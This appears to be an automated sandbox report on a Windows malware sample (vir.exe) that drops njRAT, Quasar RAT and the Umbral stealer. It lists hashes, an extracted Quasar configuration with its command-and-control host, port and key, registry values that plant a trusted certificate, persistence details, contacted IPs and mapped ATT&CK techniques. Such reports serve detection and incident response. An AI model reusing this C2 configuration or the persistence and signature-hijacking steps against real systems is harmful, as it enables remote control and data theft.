njrat | c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

Resubmissions

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

18-08-2024 14:30

15-08-2024 23:29

15-08-2024 23:15

15-08-2024 22:57

15-08-2024 22:44

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
15-08-2024 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vir.exe
Size

336.1MB
MD5

bc82ea785da1180a8a964b3e54ad106c
SHA1

4c1952ce778455af8ed10dca7b9f77d7815e8d0a
SHA256

c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
SHA512

62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
SSDEEP

6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Score

10^/10

njrat quasar umbral romka defense_evasion discovery evasion ransomware spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes

encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
install_name
Romilyaa.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows 10 Boot
subdirectory
SubDir

Signatures

Detect Umbral payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\SolaraBootstraper.exe	family_umbral

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 11 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\scary.exe	family_quasar
behavioral1/memory/3920-4308-0x00000000000D0000-0x00000000003F4000-memory.dmp	family_quasar
behavioral1/memory/2780-4322-0x0000000000380000-0x00000000006A4000-memory.dmp	family_quasar
behavioral1/memory/2540-4352-0x00000000003D0000-0x00000000006F4000-memory.dmp	family_quasar
behavioral1/memory/1472-4368-0x0000000000E40000-0x0000000001164000-memory.dmp	family_quasar
behavioral1/memory/2928-4962-0x0000000000EE0000-0x0000000001204000-memory.dmp	family_quasar
behavioral1/memory/3048-5238-0x0000000001220000-0x0000000001544000-memory.dmp	family_quasar
behavioral1/memory/3392-5268-0x00000000002B0000-0x00000000005D4000-memory.dmp	family_quasar
behavioral1/memory/3236-5285-0x00000000000C0000-0x00000000003E4000-memory.dmp	family_quasar
behavioral1/memory/440-5295-0x0000000000360000-0x0000000000684000-memory.dmp	family_quasar
behavioral1/memory/2556-5305-0x0000000000120000-0x0000000000444000-memory.dmp	family_quasar

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

23 2000 mshta.exe
24 2000 mshta.exe
27 2000 mshta.exe

flow	pid	process
23	2000	mshta.exe
24	2000	mshta.exe
27	2000	mshta.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

iexplore.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\44708873D621DF29EE6D485B9784E93DECC08490\Blob = 0f0000000100000014000000952911d57387fbdf72fd1b7770f20d0e0e0bbdb90200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000340063003200360064006400630061002d0066003300610034002d0034006200360030002d0061003500640039002d0035006100650061006100640035006400360033003100660000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000003000000010000001400000044708873d621df29ee6d485b9784e93decc08490200000000100000000030000308202fc308201e4a003020102021064d1136164d5668641a2a8969671d9f5300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353233313730345a180f32313234303732323233313730345a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc3ba88a90b7a15591240c0f73554b335213c1b757dd4c2787c63ad1f305e14e377fde3bbfce9632594450359d25487a591963a651f25909edf7af978e6d93800d56a0466c3e82a89daafe34a125110b8caabe931ac49671da808d7e8e1d0ef485b3ce45feb0f00671a61faad39a7f6ebaae14a2ef914cd366ee0064ae6103f9c40fc86117142f38995b3e44066fd8ab79bf6129d76ef9c9a2ba04017f3203b6dee91de81d72e8e67bb744421bd06043dd2e8fd1da34371142079d75e2986f11d40001b7ff1a19385e615309a3b34dc55d4d94cbae33982674fa8b7bf9987c187c1d9661dd103660139a99b3e9bc5176953becc2d5a5dfe1387efbc9ffb2d1750203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4050534251574659540030090603551d1304023000300d06092a864886f70d0101050500038201010040c2535abc38729fba2af9ddb66eb0e16d822e7d9965a732391415dd9f0eab2cddb9fec31061e517a54fe77d93057bbd7295ff024a454e76521d1acb8d96ab02b09c24bc8d715e7a2e21ed2a8558ec12ca49fa36b51e674e303eeacd083f469c60225a99c679f6e9b4ea5a126270af1d1bd4c1c37217b4e5e39414a20206e1c431363d9cd62ad3c0db0e72271e85d8e964a1f1057046dc6d13b8bc0b7a6bdcc092b599401b7c6290029ee35e188d5af906da4388e2a33af31316601d122360fc8b13ea0d6c7af9cecde8372880efce2226736fddabde7bda30c500c9b9714d915bd0bf635ea75cf363a9a52098f34283a58472f7cd5d48d89a0fa5bfa52976a2	iexplore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\44708873D621DF29EE6D485B9784E93DECC08490\Blob = 0f0000000100000014000000952911d57387fbdf72fd1b7770f20d0e0e0bbdb903000000010000001400000044708873d621df29ee6d485b9784e93decc08490200000000100000000030000308202fc308201e4a003020102021064d1136164d5668641a2a8969671d9f5300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353233313730345a180f32313234303732323233313730345a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc3ba88a90b7a15591240c0f73554b335213c1b757dd4c2787c63ad1f305e14e377fde3bbfce9632594450359d25487a591963a651f25909edf7af978e6d93800d56a0466c3e82a89daafe34a125110b8caabe931ac49671da808d7e8e1d0ef485b3ce45feb0f00671a61faad39a7f6ebaae14a2ef914cd366ee0064ae6103f9c40fc86117142f38995b3e44066fd8ab79bf6129d76ef9c9a2ba04017f3203b6dee91de81d72e8e67bb744421bd06043dd2e8fd1da34371142079d75e2986f11d40001b7ff1a19385e615309a3b34dc55d4d94cbae33982674fa8b7bf9987c187c1d9661dd103660139a99b3e9bc5176953becc2d5a5dfe1387efbc9ffb2d1750203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4050534251574659540030090603551d1304023000300d06092a864886f70d0101050500038201010040c2535abc38729fba2af9ddb66eb0e16d822e7d9965a732391415dd9f0eab2cddb9fec31061e517a54fe77d93057bbd7295ff024a454e76521d1acb8d96ab02b09c24bc8d715e7a2e21ed2a8558ec12ca49fa36b51e674e303eeacd083f469c60225a99c679f6e9b4ea5a126270af1d1bd4c1c37217b4e5e39414a20206e1c431363d9cd62ad3c0db0e72271e85d8e964a1f1057046dc6d13b8bc0b7a6bdcc092b599401b7c6290029ee35e188d5af906da4388e2a33af31316601d122360fc8b13ea0d6c7af9cecde8372880efce2226736fddabde7bda30c500c9b9714d915bd0bf635ea75cf363a9a52098f34283a58472f7cd5d48d89a0fa5bfa52976a2	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\44708873D621DF29EE6D485B9784E93DECC08490\Blob = 0f0000000100000014000000952911d57387fbdf72fd1b7770f20d0e0e0bbdb903000000010000001400000044708873d621df29ee6d485b9784e93decc084900200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000340063003200360064006400630061002d0066003300610034002d0034006200360030002d0061003500640039002d0035006100650061006100640035006400360033003100660000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a003020102021064d1136164d5668641a2a8969671d9f5300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353233313730345a180f32313234303732323233313730345a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc3ba88a90b7a15591240c0f73554b335213c1b757dd4c2787c63ad1f305e14e377fde3bbfce9632594450359d25487a591963a651f25909edf7af978e6d93800d56a0466c3e82a89daafe34a125110b8caabe931ac49671da808d7e8e1d0ef485b3ce45feb0f00671a61faad39a7f6ebaae14a2ef914cd366ee0064ae6103f9c40fc86117142f38995b3e44066fd8ab79bf6129d76ef9c9a2ba04017f3203b6dee91de81d72e8e67bb744421bd06043dd2e8fd1da34371142079d75e2986f11d40001b7ff1a19385e615309a3b34dc55d4d94cbae33982674fa8b7bf9987c187c1d9661dd103660139a99b3e9bc5176953becc2d5a5dfe1387efbc9ffb2d1750203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e4050534251574659540030090603551d1304023000300d06092a864886f70d0101050500038201010040c2535abc38729fba2af9ddb66eb0e16d822e7d9965a732391415dd9f0eab2cddb9fec31061e517a54fe77d93057bbd7295ff024a454e76521d1acb8d96ab02b09c24bc8d715e7a2e21ed2a8558ec12ca49fa36b51e674e303eeacd083f469c60225a99c679f6e9b4ea5a126270af1d1bd4c1c37217b4e5e39414a20206e1c431363d9cd62ad3c0db0e72271e85d8e964a1f1057046dc6d13b8bc0b7a6bdcc092b599401b7c6290029ee35e188d5af906da4388e2a33af31316601d122360fc8b13ea0d6c7af9cecde8372880efce2226736fddabde7bda30c500c9b9714d915bd0bf635ea75cf363a9a52098f34283a58472f7cd5d48d89a0fa5bfa52976a2	iexplore.exe

.NET Reactor proctector 35 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/2904-373-0x0000000006190000-0x00000000066DE000-memory.dmp	net_reactor
behavioral1/memory/2904-369-0x0000000005C40000-0x0000000006190000-memory.dmp	net_reactor
behavioral1/memory/2904-385-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-383-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-528-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-526-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-524-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-522-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-520-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-518-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-516-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-514-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-512-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-510-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-508-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-506-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-505-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-381-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-379-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-377-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-375-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-374-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-563-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-561-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-558-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-556-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-554-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-552-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-550-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-548-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-546-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-544-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-542-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-540-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor
behavioral1/memory/2904-530-0x0000000006190000-0x00000000066D9000-memory.dmp	net_reactor

Executes dropped EXE 26 IoCs

Processes:

Rover.exeGoogle.exeregmess.exe1.exe3.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmppsiphon-tunnel-core.exethe.exescary.exewimloader.dllRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeac3.exepacker.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exe

pid	process
2904	Rover.exe
2256	Google.exe
4092	regmess.exe
872	1.exe
2744	3.exe
3204	WinaeroTweaker-1.40.0.0-setup.exe
3624	WinaeroTweaker-1.40.0.0-setup.tmp
1264	psiphon-tunnel-core.exe
3980	the.exe
3920	scary.exe
3128	wimloader.dll
2780	Romilyaa.exe
2540	Romilyaa.exe
1472	Romilyaa.exe
1096	Romilyaa.exe
1092	Romilyaa.exe
2916	ac3.exe
392	packer.exe
2928	Romilyaa.exe
3048	Romilyaa.exe
3152	Romilyaa.exe
3780	Romilyaa.exe
3392	Romilyaa.exe
3236	Romilyaa.exe
440	Romilyaa.exe
2556	Romilyaa.exe

Loads dropped DLL 28 IoCs

Processes:

cmd.execmd.exe1.execmd.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmp3.exevir.exeWerFault.exe

pid	process
2632	cmd.exe
2632	cmd.exe
2632	cmd.exe
4084	cmd.exe
4084	cmd.exe
872	1.exe
872	1.exe
1940	cmd.exe
3204	WinaeroTweaker-1.40.0.0-setup.exe
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3624	WinaeroTweaker-1.40.0.0-setup.tmp
3624	WinaeroTweaker-1.40.0.0-setup.tmp
2744	3.exe
2744	3.exe
2632	cmd.exe
2632	cmd.exe
2632	cmd.exe
3828
2632	cmd.exe
2632	cmd.exe
1916	vir.exe
2568	WerFault.exe
2568	WerFault.exe
2568	WerFault.exe
2568	WerFault.exe
2568	WerFault.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\freebobux.exe	upx
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\3.exe	upx
behavioral1/memory/2744-3487-0x0000000000E10000-0x0000000002437000-memory.dmp	upx
behavioral1/memory/2744-4323-0x0000000000E10000-0x0000000002437000-memory.dmp	upx

Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 45.79.95.126
Destination IP 50.116.7.29
Destination IP 192.46.232.63
Destination IP 185.10.58.117
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

description	ioc
Destination IP	45.79.95.126
Destination IP	50.116.7.29
Destination IP	192.46.232.63
Destination IP	185.10.58.117

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\f3cb220f1aaa32ca310586e5f62dcab1.pack	autoit_exe
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\ac3.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\jaffa.exe	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1496 tasklist.exe

pid	process
1496	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png"	reg.exe

Drops file in Program Files directory 20 IoCs

Processes:

scary.exeWinaeroTweaker-1.40.0.0-setup.tmp

description	ioc	process
File opened for modification	C:\Program Files\SubDir\Romilyaa.exe	scary.exe
File opened for modification	C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-9QM9T.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-IGEE1.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\unins000.dat	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-99SD1.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-4EFOT.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-50H2D.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-C14I9.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification	C:\Program Files\Winaero Tweaker\Elevator.exe	WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification	C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe	WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification	C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll	WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification	C:\Program Files\Winaero Tweaker\unins000.dat	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\SubDir\Romilyaa.exe	scary.exe
File opened for modification	C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll	WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification	C:\Program Files\Winaero Tweaker\WinaeroControls.dll	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-LCQMG.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-VQPKF.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-EJNP7.tmp	WinaeroTweaker-1.40.0.0-setup.tmp
File created	C:\Program Files\Winaero Tweaker\is-L4DKA.tmp	WinaeroTweaker-1.40.0.0-setup.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2568 392 WerFault.exe packer.exe

pid	pid_target	process	target process
2568	392	WerFault.exe	packer.exe

System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

xcopy.exePING.EXEnet1.exeIEXPLORE.EXEPING.EXEcmd.exetaskkill.exe3.exexcopy.exereg.exereg.execmd.execmd.exeWinaeroTweaker-1.40.0.0-setup.exereg.execmd.exenet.execmd.exereg.exeWinaeroTweaker-1.40.0.0-setup.tmppsiphon-tunnel-core.exePING.EXEpacker.exePING.EXEnet.exePING.EXEmshta.execipher.execipher.exexcopy.execmd.exetaskkill.exexcopy.execmd.exeRover.exereg.execmd.exeIEXPLORE.EXExcopy.exeregmess.exe1.exewimloader.dllnotepad.exexcopy.exeIEXPLORE.EXEtimeout.exereg.execmd.exeac3.exenet1.exeWScript.execmd.execipher.exetaskkill.execmd.exetasklist.exetaskkill.exevir.exeipconfig.execipher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinaeroTweaker-1.40.0.0-setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinaeroTweaker-1.40.0.0-setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	psiphon-tunnel-core.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	packer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regmess.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wimloader.dll
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vir.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cipher.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 17 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2500	PING.EXE
4056	PING.EXE
2384	PING.EXE
2856	PING.EXE
2932	PING.EXE
3820	PING.EXE
2640	PING.EXE
3412	PING.EXE
968	PING.EXE
3124	PING.EXE
3460	PING.EXE
2104	PING.EXE
2560	PING.EXE
1388	PING.EXE
1028	PING.EXE
2128	PING.EXE
2144	PING.EXE

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\1.exe	nsis_installer_2

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1680 timeout.exe

pid	process
1680	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
